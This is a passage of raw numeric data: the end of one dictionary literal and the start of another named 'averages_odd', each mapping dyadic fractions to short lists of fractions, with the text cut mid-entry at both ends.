0.109375], 0.55859375: [0.3125, 0.4375, 0.8125, 0.6875, 0.0625, 0.1875, 0.5625, 0.9375], 0.515380859375: [0.984375, 0.015625], 0.9375: [0.5, 0.75, 0.0, 0.25], 0.392333984375: [0.828125, 0.171875], 0.157958984375: [0.328125, 0.671875], 0.116943359375: [0.234375, 0.765625], 0.8505859375: [0.65625, 0.84375, 0.15625, 0.34375], 0.734130859375: [0.984375, 0.015625], 0.078125: [0.375, 0.625, 0.875, 0.125], 0.954833984375: [0.828125, 0.171875], 0.634521484375: [0.921875, 0.078125], 0.460693359375: [0.765625, 0.234375], 0.421875: [0.375, 0.625, 0.875, 0.125], 0.802490234375: [0.703125, 0.296875], 0.6083984375: [0.28125, 0.71875, 0.78125, 0.21875], 0.870849609375: [0.859375, 
0.140625], 0.339599609375: [0.859375, 0.140625], 0.982177734375: [0.953125, 0.046875], 0.560302734375: [0.453125, 0.546875], 0.09375: [0.25, 0.5, 0.75, 0.0], 0.226318359375: [0.265625, 0.734375], 0.1875: [0.25, 0.5, 0.75, 0.0], 0.021240234375: [0.296875, 0.703125], 0.628662109375: [0.890625, 0.109375], 0.58984375: [0.4375, 0.5625, 0.9375, 0.8125, 0.1875, 0.3125, 0.6875, 0.0625], 0.704833984375: [0.828125, 0.171875], 0.96875: [0.5, 0.75, 0.0, 0.25], 0.165771484375: [0.921875, 0.078125], 0.120849609375: [0.859375, 0.140625], 0.271240234375: [0.296875, 0.703125], 0.169677734375: [0.953125, 0.046875], 0.286865234375: [0.796875, 0.203125], 0.046630859375: [0.984375, 0.015625], 0.476318359375: [0.734375, 0.265625], 0.4375: [0.5, 0.75, 0.0, 0.25], 0.833740234375: [0.703125, 0.296875], 0.6396484375: [0.71875, 0.78125, 0.21875, 0.28125], 0.6875: [0.5, 0.75, 0.0, 0.25], 0.902099609375: [0.859375, 0.140625], 0.355224609375: [0.359375, 0.640625], 0.591552734375: [0.453125, 0.546875], 0.234130859375: [0.984375, 0.015625], 0.3505859375: [0.34375, 0.65625, 0.84375, 0.15625], 0.659912109375: [0.890625, 0.109375], 0.62109375: [0.3125, 0.4375, 0.8125, 0.6875, 0.0625, 0.1875, 0.5625, 0.9375], 0.517333984375: [0.828125, 0.171875], 0.1162109375: [0.40625, 0.59375, 0.90625, 0.09375], 0.013427734375: [0.953125, 0.046875], 0.173583984375: [0.828125, 0.171875], 0.767333984375: [0.828125, 0.171875], 0.124755859375: [0.484375, 0.515625], 0.245849609375: [0.859375, 0.140625], 0.9130859375: [0.65625, 0.84375, 0.15625, 0.34375], 0.796630859375: [0.984375, 0.015625], 0.302490234375: [0.296875, 0.703125], 0.491943359375: [0.765625, 0.234375], 0.453125: [0.375, 0.625, 0.875, 0.125], 0.864990234375: [0.703125, 0.296875], 0.6708984375: [0.71875, 0.78125, 0.21875, 0.28125], 0.554443359375: [0.765625, 0.234375], 0.933349609375: [0.859375, 0.140625], 0.370849609375: [0.859375, 0.140625], 0.622802734375: [0.453125, 0.546875], 0.064208984375: [0.328125, 0.671875], 0.005615234375: [0.796875, 0.203125], 
0.241943359375: [0.765625, 0.234375], 0.203125: [0.375, 0.625, 0.875, 0.125], 0.3662109375: [0.40625, 0.59375, 0.90625, 0.09375], 0.691162109375: [0.890625, 0.109375], 0.65234375: [0.3125, 0.4375, 0.8125, 0.6875, 0.0625, 0.1875, 0.5625, 0.9375], 0.962646484375: [0.421875, 0.578125], 0.439208984375: [0.328125, 0.671875], 0.181396484375: [0.421875, 0.578125], 0.015625: [0.375, 0.625, 0.875, 0.125], 0.796875: [0.375, 0.625, 0.875, 0.125], 0.21484375: [0.3125, 0.4375, 0.8125, 0.6875, 0.0625, 0.1875, 0.5625, 0.9375], 0.9443359375: [0.65625, 0.84375, 0.15625, 0.34375], 0.827880859375: [0.984375, 0.015625], 0.08984375: [0.1875, 0.3125, 0.6875, 0.9375, 0.0625, 0.4375, 0.5625, 0.8125], 0.318115234375: [0.796875, 0.203125], 0.538818359375: [0.734375, 0.265625], 0.6552734375: [0.46875, 0.53125, 0.96875, 0.03125], 0.986083984375: [0.828125, 0.171875], 0.46875: [0.5, 0.75, 0.0, 0.25], 0.896240234375: [0.703125, 0.296875], 0.7021484375: [0.71875, 0.78125, 0.21875, 0.28125], 0.585693359375: [0.765625, 0.234375], 0.546875: [0.375, 0.625, 0.875, 0.125], 0.964599609375: [0.859375, 0.140625], 0.386474609375: [0.359375, 0.640625], 0.654052734375: [0.453125, 0.546875], 0.068115234375: [0.796875, 0.203125], 0.618896484375: [0.421875, 0.578125], 0.4052734375: [0.46875, 0.53125, 0.96875, 0.03125], 0.019287109375: [0.390625, 0.609375], 0.249755859375: [0.484375, 0.515625], 0.3818359375: [0.34375, 0.65625, 0.84375, 0.15625], 0.722412109375: [0.890625, 0.109375], 0.68359375: [0.4375, 0.5625, 0.9375, 0.8125, 0.1875, 0.3125, 0.6875, 0.0625], 0.265380859375: [0.984375, 0.015625], 0.519287109375: [0.390625, 0.609375], 0.454833984375: [0.828125, 0.171875], 0.189208984375: [0.328125, 0.671875], 0.9755859375: [0.65625, 0.84375, 0.15625, 0.34375], 0.859130859375: [0.984375, 0.015625], 0.333740234375: [0.296875, 0.703125], 0.128662109375: [0.890625, 0.109375], 0.689208984375: [0.671875, 0.328125], 0.484375: [0.375, 0.625, 0.875, 0.125], 0.927490234375: [0.703125, 0.296875], 0.056396484375: [0.421875, 
0.578125], 0.7333984375: [0.71875, 0.78125, 0.21875, 0.28125], 0.616943359375: [0.765625, 0.234375], 0.578125: [0.375, 0.625, 0.875, 0.125], 0.995849609375: [0.859375, 0.140625], 0.402099609375: [0.859375, 0.140625], 0.685302734375: [0.453125, 0.546875], 0.072021484375: [0.921875, 0.078125], 0.1083984375: [0.21875, 0.28125, 0.71875, 0.78125], 0.21875: [0.25, 0.5, 0.75, 0.0], 0.3974609375: [0.40625, 0.59375, 0.90625, 0.09375], 0.753662109375: [0.890625, 0.109375], 0.71484375: [0.4375, 0.5625, 0.9375, 0.8125, 0.1875, 0.3125, 0.6875, 0.0625], 0.281005859375: [0.484375, 0.515625], 0.470458984375: [0.328125, 0.671875], 0.197021484375: [0.921875, 0.078125], 0.931396484375: [0.421875, 0.578125], 0.304443359375: [0.765625, 0.234375], 0.890380859375: [0.984375, 0.015625], 0.349365234375: [0.796875, 0.203125], 0.702880859375: [0.984375, 0.015625], 0.136474609375: [0.359375, 0.640625], 0.958740234375: [0.703125, 0.296875], 0.7646484375: [0.71875, 0.78125, 0.21875, 0.28125], 0.648193359375: [0.765625, 0.234375], 0.609375: [0.375, 0.625, 0.875, 0.125], 0.829833984375: [0.828125, 0.171875], 0.417724609375: [0.359375, 0.640625], 0.716552734375: [0.453125, 0.546875], 0.075927734375: [0.953125, 0.046875], 0.1318359375: [0.34375, 0.65625, 0.84375, 0.15625], 0.265625: [0.375, 0.625, 0.875, 0.125], 0.2958984375: [0.28125, 0.71875, 0.78125, 0.21875], 0.4130859375: [0.34375, 0.65625, 0.84375, 0.15625], 0.784912109375: [0.890625, 0.109375], 0.74609375: [0.4375, 0.5625, 0.9375, 0.8125, 0.1875, 0.3125, 0.6875, 0.0625], 0.2880859375: [0.34375, 0.65625, 0.84375, 0.15625], 0.773193359375: [0.765625, 0.234375], 0.521240234375: [0.703125, 0.296875], 0.486083984375: [0.828125, 0.171875], 0.204833984375: [0.828125, 0.171875], 0.542724609375: [0.359375, 0.640625], 0.921630859375: [0.984375, 0.015625], 0.364990234375: [0.296875, 0.703125], 0.144287109375: [0.390625, 0.609375], 0.989990234375: [0.703125, 0.296875], 0.7958984375: [0.71875, 0.78125, 0.21875, 0.28125], 0.679443359375: [0.765625, 
0.234375], 0.640625: [0.375, 0.625, 0.875, 0.125], 0.433349609375: [0.859375, 0.140625], 0.747802734375: [0.453125, 0.546875], 0.079833984375: [0.828125, 0.171875], 0.1396484375: [0.21875, 0.28125, 0.71875, 0.78125], 0.5537109375: [0.40625, 0.59375, 0.90625, 0.09375], 0.234375: [0.375, 0.625, 0.875, 0.125], 0.027099609375: [0.859375, 0.140625], 0.296630859375: [0.984375, 0.015625], 0.77734375: [0.4375, 0.5625, 0.9375, 0.8125, 0.1875, 0.3125, 0.6875, 0.0625], 0.312255859375: [0.484375, 0.515625], 0.212646484375: [0.421875, 0.578125], 0.573974609375: [0.359375, 0.640625], 0.5146484375: [0.71875, 0.78125, 0.21875, 0.28125], 0.380615234375: [0.796875, 0.203125], 0.152099609375: [0.859375, 0.140625], 0.472412109375: [0.890625, 0.109375], 0.710693359375: [0.765625, 0.234375], 0.671875: [0.375, 0.625, 0.875, 0.125], 0.259521484375: [0.921875, 0.078125], 0.6318359375: [0.34375, 0.65625, 0.84375, 0.15625], 0.448974609375: [0.359375, 0.640625], 0.779052734375: [0.453125, 0.546875], 0.083740234375: [0.296875, 0.703125], 0.1474609375: [0.40625, 0.59375, 0.90625, 0.09375], 0.5849609375: [0.40625, 0.59375, 0.90625, 0.09375], 0.673583984375: [0.828125, 0.171875], 0.4443359375: [0.34375, 0.65625, 0.84375, 0.15625], 0.847412109375: [0.890625, 0.109375], 0.80859375: [0.4375, 0.5625, 0.9375, 0.8125, 0.1875, 0.3125, 0.6875, 0.0625], 0.327880859375: [0.984375, 0.015625], 0.853271484375: [0.921875, 0.078125], 0.536865234375: [0.796875, 0.203125], 0.523193359375: [0.765625, 0.234375], 0.976318359375: [0.734375, 0.265625], 0.220458984375: [0.328125, 0.671875], 0.130615234375: [0.796875, 0.203125], 0.556396484375: [0.421875, 0.578125], 0.515625: [0.375, 0.625, 0.875, 0.125], 0.109375: [0.375, 0.625, 0.875, 0.125], 0.396240234375: [0.296875, 0.703125], 0.159912109375: [0.890625, 0.109375], 0.743896484375: [0.421875, 0.578125], 0.8583984375: [0.71875, 0.78125, 0.21875, 0.28125], 0.741943359375: [0.765625, 0.234375], 0.703125: [0.375, 0.625, 0.875, 0.125], 0.275146484375: [0.421875, 
0.578125], 0.111083984375: [0.828125, 0.171875], 0.464599609375: [0.859375, 0.140625], 0.810302734375: [0.453125, 0.546875], 0.087646484375: [0.421875, 0.578125], 0.1552734375: [0.46875, 0.53125, 0.96875, 0.03125], 0.6162109375: [0.40625, 0.59375, 0.90625, 0.09375], 0.4599609375: [0.40625, 0.59375, 0.90625, 0.09375], 0.878662109375: [0.890625, 0.109375], 0.83984375: [0.4375, 0.5625, 0.9375, 0.8125, 0.1875, 0.3125, 0.6875, 0.0625], 0.343505859375: [0.484375, 0.515625], 0.4912109375: [0.40625, 0.59375, 0.90625, 0.09375], 0.228271484375: [0.921875, 0.078125], 0.636474609375: [0.359375, 0.640625], 0.0146484375: [0.21875, 0.28125, 0.71875, 0.78125], 0.306396484375: [0.421875, 0.578125], 0.411865234375: [0.796875, 0.203125], 0.167724609375: [0.359375, 0.640625], 0.638427734375: [0.953125, 0.046875], 0.8896484375: [0.71875, 0.78125, 0.21875, 0.28125], 0.058349609375: [0.859375, 0.140625], 0.734375: [0.375, 0.625, 0.875, 0.125], 0.290771484375: [0.921875, 0.078125], 0.480224609375: [0.359375, 0.640625], 0.841552734375: [0.453125, 0.546875], 0.091552734375: [0.453125, 0.546875], 0.1630859375: [0.34375, 0.65625, 0.84375, 0.15625], 0.6474609375: [0.40625, 0.59375, 0.90625, 0.09375], 0.4755859375: [0.34375, 0.65625, 0.84375, 0.15625], 0.909912109375: [0.890625, 0.109375], 0.87109375: [0.4375, 0.5625, 0.9375, 0.8125, 0.1875, 0.3125, 0.6875, 0.0625], 0.359130859375: [0.984375, 0.015625], 0.599365234375: [0.796875, 0.203125], 0.525146484375: [0.421875, 0.578125], 0.978271484375: [0.921875, 0.078125], 0.0224609375: [0.40625, 0.59375, 0.90625, 0.09375], 0.667724609375: [0.359375, 0.640625], 0.060302734375: [0.453125, 0.546875], 0.177490234375: [0.296875, 0.703125], 0.427490234375: [0.296875, 0.703125], 0.175537109375: [0.390625, 0.609375], 0.9208984375: [0.71875, 0.78125, 0.21875, 0.28125], 0.804443359375: [0.765625, 0.234375], 0.765625: [0.375, 0.625, 0.875, 0.125], 0.720458984375: [0.328125, 0.671875], 0.587646484375: [0.421875, 0.578125], 0.062255859375: [0.484375, 0.515625], 
0.495849609375: [0.859375, 0.140625], 0.872802734375: [0.453125, 0.546875], 0.1708984375: [0.28125, 0.71875, 0.78125, 0.21875], 0.6787109375: [0.40625, 0.59375, 0.90625, 0.09375], 0.562255859375: [0.484375, 0.515625], 0.031005859375: [0.484375, 0.515625], 0.941162109375: [0.890625, 0.109375], 0.90234375: [0.4375, 0.5625, 0.9375, 0.8125, 0.1875, 0.3125, 0.6875, 0.0625], 0.374755859375: [0.484375, 0.515625], 0.630615234375: [0.796875, 0.203125], 0.243896484375: [0.421875, 0.578125], 0.698974609375: [0.359375, 0.640625], 0.761474609375: [0.359375, 0.640625], 0.253662109375: [0.890625, 0.109375], 0.657958984375: [0.328125, 0.671875], 0.12109375: [0.3125, 0.4375, 0.8125, 0.6875, 0.0625, 0.1875, 0.5625, 0.9375], 0.443115234375: [0.796875, 0.203125], 0.183349609375: [0.859375, 0.140625], 0.775146484375: [0.421875, 0.578125], 0.9521484375: [0.71875, 0.78125, 0.21875, 0.28125], 0.835693359375: [0.765625, 0.234375], 0.298583984375: [0.828125, 0.171875], 0.322021484375: [0.921875, 0.078125], 0.788818359375: [0.734375, 0.265625], 0.601318359375: [0.734375, 0.265625], 0.75: [0.5, 0.75, 0.0, 0.25], 0.904052734375: [0.453125, 0.546875], 0.099365234375: [0.203125, 0.796875], 0.1787109375: [0.40625, 0.59375, 0.90625, 0.09375], 0.7099609375: [0.40625, 0.59375, 0.90625, 0.09375], 0.593505859375: [0.484375, 0.515625], 0.972412109375: [0.890625, 0.109375], 0.93359375: [0.4375, 0.5625, 0.9375, 0.8125, 0.1875, 0.3125, 0.6875, 0.0625], 0.390380859375: [0.984375, 0.015625], 0.661865234375: [0.796875, 0.203125], 0.816162109375: [0.890625, 0.109375], 0.527099609375: [0.859375, 0.140625], 0.730224609375: [0.359375, 0.640625], 0.269287109375: [0.390625, 0.609375], 0.458740234375: [0.296875, 0.703125], 0.191162109375: [0.890625, 0.109375], 0.15234375: [0.3125, 0.4375, 0.8125, 0.6875, 0.0625, 0.1875, 0.5625, 0.9375], 0.2646484375: [0.28125, 0.71875, 0.78125, 0.21875], 0.9599609375: [0.40625, 0.59375, 0.90625, 0.09375], 0.798583984375: [0.828125, 0.171875], 0.9833984375: [0.71875, 0.78125, 
0.21875, 0.28125], 0.866943359375: [0.765625, 0.234375], 0.828125: [0.375, 0.625, 0.875, 0.125], 0.337646484375: [0.421875, 0.578125], 0.032958984375: [0.328125, 0.671875], 0.935302734375: [0.453125, 0.546875], 0.103271484375: [0.921875, 0.078125], 0.7412109375: [0.40625, 0.59375, 0.90625, 0.09375], 0.624755859375: [0.484375, 0.515625], 0.96484375: [0.4375, 0.5625, 0.9375, 0.8125, 0.1875, 0.3125, 0.6875, 0.0625], 0.406005859375: [0.484375, 0.515625], 0.693115234375: [0.796875, 0.203125], 0.884521484375: [0.921875, 0.078125], 0.868896484375: [0.421875, 0.578125], 0.034912109375: [0.890625, 0.109375], 0.284912109375: [0.890625, 0.109375], 0.859375: [0.375, 0.625, 0.875, 0.125], 0.308349609375: [0.859375, 0.140625], 0.474365234375: [0.796875, 0.203125], 0.198974609375: [0.359375, 0.640625], 0.2802734375: [0.46875, 0.53125, 0.96875, 0.03125], 0.898193359375: [0.765625, 0.234375], 0.366943359375: [0.765625, 0.234375], 0.353271484375: [0.921875, 0.078125], 0.138427734375: [0.953125, 0.046875], 0.05859375: [0.3125, 0.4375, 0.8125, 0.6875, 0.0625, 0.1875, 0.5625, 0.9375], 0.107177734375: [0.953125, 0.046875], 0.3349609375: [0.40625, 0.59375, 0.90625, 0.09375], 0.7724609375: [0.40625, 0.59375, 0.90625, 0.09375], 0.656005859375: [0.484375, 0.515625], 0.939208984375: [0.671875, 0.328125], 0.99609375: [0.4375, 0.5625, 0.9375, 0.8125, 0.1875, 0.3125, 0.6875, 0.0625], 0.724365234375: [0.796875, 0.203125], 0.952880859375: [0.984375, 0.015625], 0.642333984375: [0.828125, 0.171875], 0.529052734375: [0.453125, 0.546875], 0.1943359375: [0.34375, 0.65625, 0.84375, 0.15625], 0.300537109375: [0.390625, 0.609375], 0.046875: [0.375, 0.625, 0.875, 0.125], 0.489990234375: [0.296875, 0.703125], 0.501708984375: [0.328125, 0.671875], 0.206787109375: [0.390625, 0.609375], 0.550537109375: [0.390625, 0.609375], 0.929443359375: [0.765625, 0.234375], 0.890625: [0.625, 0.875, 0.125, 0.375], 0.368896484375: [0.421875, 0.578125], 0.146240234375: [0.296875, 0.703125], 0.997802734375: [0.453125, 
0.546875], 0.095458984375: [0.328125, 0.671875], 0.2021484375: [0.28125, 0.71875, 0.78125, 0.21875], 0.8037109375: [0.40625, 0.59375, 0.90625, 0.09375], 0.687255859375: [0.484375, 0.515625], 0.697021484375: [0.921875, 0.078125], 0.769287109375: [0.390625, 0.609375], 0.437255859375: [0.484375, 0.515625], 0.755615234375: [0.796875, 0.203125], 0.5615234375: [0.46875, 0.53125, 0.96875, 0.03125], 0.8271484375: [0.71875, 0.78125, 0.21875, 0.28125], 0.823974609375: [0.359375, 0.640625], 0.316162109375: [0.890625, 0.109375], 0.27734375: [0.3125, 0.4375, 0.8125, 0.6875, 0.0625, 0.1875, 0.5625, 0.9375], 0.712646484375: [0.421875, 0.578125], 0.1865234375: [0.46875, 0.53125, 0.96875, 0.03125], 0.5224609375: [0.40625, 0.59375, 0.90625, 0.09375], 0.984130859375: [0.984375, 0.015625], 0.214599609375: [0.859375, 0.140625], 0.3115234375: [0.46875, 0.53125, 0.96875, 0.03125], 0.581787109375: [0.390625, 0.609375], 0.960693359375: [0.765625, 0.234375], 0.921875: [0.625, 0.875, 0.125, 0.375], 0.384521484375: [0.921875, 0.078125], 0.038818359375: [0.265625, 0.734375], 0.751708984375: [0.671875, 0.328125], 0.114990234375: [0.296875, 0.703125], 0.2099609375: [0.40625, 0.59375, 0.90625, 0.09375], 0.8349609375: [0.40625, 0.59375, 0.90625, 0.09375], 0.718505859375: [0.484375, 0.515625], 0.765380859375: [0.984375, 0.015625], 0.8818359375: [0.65625, 0.84375, 0.15625, 0.34375], 0.452880859375: [0.984375, 0.015625], 0.786865234375: [0.796875, 0.203125], 0.5927734375: [0.46875, 0.53125, 0.96875, 0.03125], 0.531005859375: [0.484375, 0.515625], 0.855224609375: [0.640625, 0.359375], 0.331787109375: [0.390625, 0.609375], 0.792724609375: [0.359375, 0.640625], 0.544677734375: [0.953125, 0.046875], 0.726318359375: [0.734375, 0.265625], 0.222412109375: [0.890625, 0.109375], 0.18359375: [0.3125, 0.4375, 0.8125, 0.6875, 0.0625, 0.1875, 0.5625, 0.9375], 0.3271484375: [0.28125, 0.71875, 0.78125, 0.21875], 0.613037109375: [0.390625, 0.609375], 0.991943359375: [0.765625, 0.234375], 0.953125: [0.375, 0.625, 
0.875, 0.125], 0.040771484375: [0.921875, 0.078125], 0.118896484375: [0.421875, 0.578125], 0.2177734375: [0.46875, 0.53125, 0.96875, 0.03125], 0.8662109375: [0.40625, 0.59375, 0.90625, 0.09375], 0.749755859375: [0.484375, 0.515625], 0.279052734375: [0.453125, 0.546875], 0.468505859375: [0.484375, 0.515625], 0.818115234375: [0.796875, 0.203125], 0.6240234375: [0.46875, 0.53125, 0.96875, 0.03125], 0.923583984375: [0.828125, 0.171875], 0.886474609375: [0.640625, 0.359375], 0.347412109375: [0.890625, 0.109375], 0.30859375: [0.3125, 0.4375, 0.8125, 0.6875, 0.0625, 0.1875, 0.5625, 0.9375], 0.575927734375: [0.953125, 0.046875], 0.263427734375: [0.953125, 0.046875], 0.876708984375: [0.671875, 0.328125], 0.230224609375: [0.359375, 0.640625], 0.3427734375: [0.46875, 0.53125, 0.96875, 0.03125], 0.644287109375: [0.390625, 0.609375], 0.564208984375: [0.328125, 0.671875], 0.984375: [0.625, 0.875, 0.125, 0.375], 0.415771484375: [0.921875, 0.078125], 0.042724609375: [0.359375, 0.640625], 0.888427734375: [0.953125, 0.046875], 0.993896484375: [0.421875, 0.578125], 0.122802734375: [0.453125, 0.546875], 0.2255859375: [0.34375, 0.65625, 0.84375, 0.15625], 0.8974609375: [0.40625, 0.59375, 0.90625, 0.09375], 0.781005859375: [0.484375, 0.515625], 0.294677734375: [0.953125, 0.046875], 0.484130859375: [0.984375, 0.015625], 0.849365234375: [0.796875, 0.203125], 0.605224609375: [0.359375, 0.640625], 0.532958984375: [0.328125, 0.671875], 0.025146484375: [0.421875, 0.578125], 0.0302734375: [0.46875, 0.53125, 0.96875, 0.03125], 0.917724609375: [0.640625, 0.359375], 0.036865234375: [0.796875, 0.203125], 0.607177734375: [0.953125, 0.046875], 0.140380859375: [0.984375, 0.015625], 0.003662109375: [0.890625, 0.109375], 0.238037109375: [0.390625, 0.609375], 0.3583984375: [0.28125, 0.71875, 0.78125, 0.21875], 0.675537109375: [0.390625, 0.609375], 0.431396484375: [0.421875, 0.578125], 0.044677734375: [0.953125, 0.046875], 0.2333984375: [0.28125, 0.71875, 0.78125, 0.21875], 0.9287109375: [0.40625, 
0.59375, 0.90625, 0.09375], 0.812255859375: [0.484375, 0.515625], 0.310302734375: [0.453125, 0.546875], 0.970458984375: [0.671875, 0.328125], 0.499755859375: [0.484375, 0.515625], 0.880615234375: [0.796875, 0.203125], 0.6865234375: [0.46875, 0.53125, 0.96875, 0.03125], 0.570068359375: [0.734375, 0.265625], 0.948974609375: [0.359375, 0.640625], 0.378662109375: [0.890625, 0.109375], 0.33984375: [0.3125, 0.4375, 0.8125, 0.6875, 0.0625, 0.1875, 0.5625, 0.9375], 0.0380859375: [0.34375, 0.65625, 0.84375, 0.15625], 0.066162109375: [0.890625, 0.109375], 0.171875: [0.375, 0.625, 0.875, 0.125], 0.011474609375: [0.359375, 0.640625], 0.3740234375: [0.46875, 0.53125, 0.96875, 0.03125], 0.706787109375: [0.390625, 0.609375], 0.257568359375: [0.265625, 0.734375], 0.447021484375: [0.921875, 0.078125], 0.185302734375: [0.453125, 0.546875], 0.023193359375: [0.234375, 0.765625], 0.2412109375: [0.40625, 0.59375, 0.90625, 0.09375], 0.4287109375: [0.40625, 0.59375, 0.90625, 0.09375], 0.843505859375: [0.484375, 0.515625], 0.423583984375: [0.828125, 0.171875], 0.325927734375: [0.953125, 0.046875], 0.728271484375: [0.921875, 0.078125], 0.837646484375: [0.421875, 0.578125], 0.911865234375: [0.796875, 0.203125], 0.7177734375: [0.46875, 0.53125, 0.96875, 0.03125], 0.503662109375: [0.890625, 0.109375], 0.5625: [0.5, 0.75, 0.0, 0.25], 0.947021484375: [0.921875, 0.078125], 0.980224609375: [0.640625, 0.359375], 0.394287109375: [0.390625, 0.609375], 0.669677734375: [0.953125, 0.046875], 0.070068359375: [0.265625, 0.734375], 0.52734375: [0.3125, 0.4375, 0.8125, 0.6875, 0.0625, 0.1875, 0.5625, 0.9375], 0.03125: [0.25, 0.5, 0.75, 0.0], 0.3896484375: [0.71875, 0.78125, 0.21875, 0.28125], 0.738037109375: [0.390625, 0.609375], 0.273193359375: [0.765625, 0.234375], 0.907958984375: [0.671875, 0.328125], 0.462646484375: [0.421875, 0.578125], 0.193115234375: [0.796875, 0.203125], 0.782958984375: [0.671875, 0.328125], 0.2490234375: [0.46875, 0.53125, 0.96875, 0.03125], 0.9912109375: [0.40625, 0.59375, 
0.90625, 0.09375], 0.874755859375: [0.484375, 0.515625], 0.341552734375: [0.453125, 0.546875], 0.132568359375: [0.265625, 0.734375], 0.851318359375: [0.734375, 0.265625], 0.943115234375: [0.796875, 0.203125], 0.7490234375: [0.46875, 0.53125, 0.96875, 0.03125], 0.632568359375: [0.734375, 0.265625], 0.59375: [0.5, 0.75, 0.0, 0.25], 0.409912109375: [0.890625, 0.109375], 0.37109375: [0.3125, 0.4375, 0.8125, 0.6875, 0.0625, 0.1875, 0.5625, 0.9375], 0.700927734375: [0.953125, 0.046875], 0.073974609375: [0.359375, 0.640625], 0.421630859375: [0.984375, 0.015625], 0.142333984375: [0.828125, 0.171875], 0.050537109375: [0.390625, 0.609375], 0.288818359375: [0.265625, 0.734375], 0.25: [0.5, 0.75, 0.0, 0.25], 0.611083984375: [0.828125, 0.171875], 0.478271484375: [0.921875, 0.078125], 0.200927734375: [0.953125, 0.046875], 0.540771484375: [0.921875, 0.078125], 0.8125: [0.5, 0.75, 0.0, 0.25], 0.906005859375: [0.484375, 0.515625], 0.357177734375: [0.953125, 0.046875], 0.400146484375: [0.421875, 0.578125]}
averages_odd={0.0: [0.25, 0.5, 0.75, 0.0], 0.001708984375: [0.328125, 0.671875], 0.216552734375: [0.453125, 0.546875], 0.974365234375: [0.796875, 0.203125], 0.0068359375: [0.34375, 0.65625, 0.84375, 0.15625], 0.029052734375: [0.453125, 0.546875], 0.505615234375: [0.796875, 0.203125], 0.0693359375: [0.34375, 0.65625, 0.84375, 0.15625], 0.681396484375: [0.421875, 0.578125], 0.425537109375: [0.390625, 0.609375], 0.732177734375: [0.953125, 0.046875], 0.892333984375: [0.828125, 0.171875], 0.5380859375: [0.34375, 0.65625, 0.84375, 0.15625], 0.915771484375: [0.921875, 0.078125], 0.5: [0.5, 0.75, 0.0, 0.25], 0.4208984375: [0.71875, 0.78125, 0.21875, 0.28125], 0.800537109375: [0.390625, 0.609375], 0.595458984375: [0.671875, 0.328125], 0.493896484375: [0.421875, 0.578125], 0.052490234375: [0.296875, 0.703125], 0.966552734375: [0.453125, 0.546875], 0.558349609375: [0.859375, 0.140625], 0.007568359375: [0.265625, 0.734375], 0.937255859375: [0.484375, 0.515625], 0.372802734375: [0.453125, 0.546875], 0.148193359375: [0.234375, 0.765625], 0.568115234375: [0.796875, 0.203125], 0.8115234375: [0.46875, 0.53125, 0.96875, 0.03125], 0.695068359375: [0.734375, 0.265625], 0.65625: [0.5, 0.75, 0.0, 0.25], 0.251708984375: [0.328125, 0.671875], 0.441162109375: [0.890625, 0.109375], 0.40234375: [0.3125, 0.4375, 0.8125, 0.6875, 0.0625, 0.1875, 0.5625, 0.9375], 0.154052734375: [0.453125, 0.546875], 0.081787109375: [0.390625, 0.609375], 0.650146484375: [0.421875, 0.578125], 0.5693359375: [0.34375, 0.65625, 0.84375, 0.15625], 0.5302734375: [0.46875, 0.53125, 0.96875, 0.03125], 0.4365234375: [0.46875, 0.53125, 0.96875, 0.03125], 0.831787109375: [0.390625, 0.609375], 0.320068359375: [0.265625, 0.734375], 0.28125: [0.25, 0.5, 0.75, 0.0], 0.7802734375: [0.46875, 0.53125, 0.96875, 0.03125], 0.625: [0.5, 0.75, 0.0, 0.25], 0.054443359375: [0.234375, 0.765625], 0.589599609375: [0.859375, 0.140625], 0.968505859375: [0.484375, 0.515625], 0.388427734375: [0.953125, 0.046875], 0.156005859375: [0.484375, 
0.515625], 0.8427734375: [0.46875, 0.53125, 0.96875, 0.03125], 0.507568359375: [0.734375, 0.265625], 0.0771484375: [0.28125, 0.71875, 0.78125, 0.21875], 0.267333984375: [0.828125, 0.171875], 0.456787109375: [0.390625, 0.609375], 0.794677734375: [0.953125, 0.046875], 0.085693359375: [0.765625, 0.234375], 0.6005859375: [0.34375, 0.65625, 0.84375, 0.15625], 0.53125: [0.5, 0.75, 0.0, 0.25], 0.24609375: [0.3125, 0.4375, 0.8125, 0.6875, 0.0625, 0.1875, 0.5625, 0.9375], 0.4521484375: [0.28125, 0.71875, 0.78125, 0.21875], 0.863037109375: [0.390625, 0.609375], 0.335693359375: [0.765625, 0.234375], 0.296875: [0.375, 0.625, 0.875, 0.125], 0.552490234375: [0.703125, 0.296875], 0.224365234375: [0.796875, 0.203125], 0.620849609375: [0.859375, 0.140625], 0.1240234375: [0.46875, 0.53125, 0.96875, 0.03125], 0.999755859375: [0.484375, 0.515625], 0.404052734375: [0.453125, 0.546875], 0.163818359375: [0.265625, 0.734375], 0.759521484375: [0.921875, 0.078125], 0.125: [0.25, 0.5, 0.75, 0.0], 0.8740234375: [0.46875, 0.53125, 0.96875, 0.03125], 0.757568359375: [0.734375, 0.265625], 0.71875: [0.5, 0.75, 0.0, 0.25], 0.282958984375: [0.328125, 0.671875], 0.015380859375: [0.984375, 0.015625], 0.825927734375: [0.953125, 0.046875], 0.089599609375: [0.859375, 0.140625], 0.407958984375: [0.328125, 0.671875], 0.4677734375: [0.46875, 0.53125, 0.96875, 0.03125], 0.894287109375: [0.390625, 0.609375], 0.351318359375: [0.734375, 0.265625], 0.3125: [0.25, 0.5, 0.75, 0.0], 0.583740234375: [0.703125, 0.296875], 0.665771484375: [0.921875, 0.078125], 0.232177734375: [0.953125, 0.046875], 0.017333984375: [0.828125, 0.171875], 0.652099609375: [0.859375, 0.140625], 0.814208984375: [0.671875, 0.328125], 0.419677734375: [0.953125, 0.046875], 0.171630859375: [0.984375, 0.015625], 0.9052734375: [0.46875, 0.53125, 0.96875, 0.03125], 0.509521484375: [0.921875, 0.078125], 0.0849609375: [0.40625, 0.59375, 0.90625, 0.09375], 0.009521484375: [0.921875, 0.078125], 0.736083984375: [0.828125, 0.171875], 0.488037109375: 
